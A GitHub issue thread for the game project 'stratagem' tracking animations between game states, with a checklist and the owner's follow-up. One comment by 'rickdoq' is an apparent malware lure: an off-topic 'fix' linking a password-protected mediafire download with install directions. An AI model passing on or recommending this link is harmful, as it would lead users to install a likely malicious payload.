### ISSUE TITLE
Add animations in between game states

### ISSUE THREAD

**Issue by vm70** [vm70/stratagem#14]
- [x] Fade-ins / fade-outs / palette swaps(?) for starting and ending a game
- [x] animations for leveling up & game-over conditions
- [x] animations for swapping gems on the grid
- [x] animations for clearing gems instead of them just disappearing
  - [x] particle effects
  - [x] shrinking gem sprites

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by vm70** [comment]
This issue is not yet complete because transitions between menu states and game states haven't been added.
